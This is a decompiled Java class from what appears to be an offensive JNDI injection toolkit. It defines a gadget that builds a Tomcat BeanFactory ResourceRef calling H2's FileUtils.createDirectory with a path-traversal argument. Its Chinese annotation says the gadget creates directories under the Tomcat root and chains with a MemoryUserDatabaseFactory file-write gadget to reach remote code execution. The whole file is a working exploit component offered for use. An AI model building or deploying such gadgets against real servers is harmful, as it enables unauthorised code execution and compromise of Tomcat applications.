package com.ar3h.chains.gadget.impl.jndi.factory.beanfactory.createdir;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

@GadgetAnnotation(name = "h2 创建文件夹", description = "factory: org.apache.naming.factory.BeanFactory\nJNDI Reference的一种，通过BeanFactory调用单String方法：org.h2.store.fs.FileUtils#createDirectory 创建文件夹，此链会在tomcat根目录下创建文件夹，会配合 MemoryUserDatabaseFactoryWriteFile 进行写文件RCE", dependencies = {"tomcat", "com.h2database:h2"})
@GadgetTags(tags = {Tag.ResourceRef, Tag.TomcatBeanFactory, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/beanfactory/createdir/H2CreateDirRef.class */
public class H2CreateDirRef implements Gadget {

    @Param(name = "dir", description = "需要手动触发两次创建目录，如下：\nstep1, create dir: http:\nstep2, create dir: http:/127.0.0.1:51399\n\n实际创建好的两层目录: http:/127.0.0.1:51399")
    public String dir = "http:";

    public Reference getObject() throws Exception {
        ResourceRef resourceRef = new ResourceRef("org.h2.store.fs.FileUtils", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        resourceRef.add(new StringRefAddr("forceString", "a=createDirectory"));
        resourceRef.add(new StringRefAddr("a", "../" + this.dir));
        return resourceRef;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
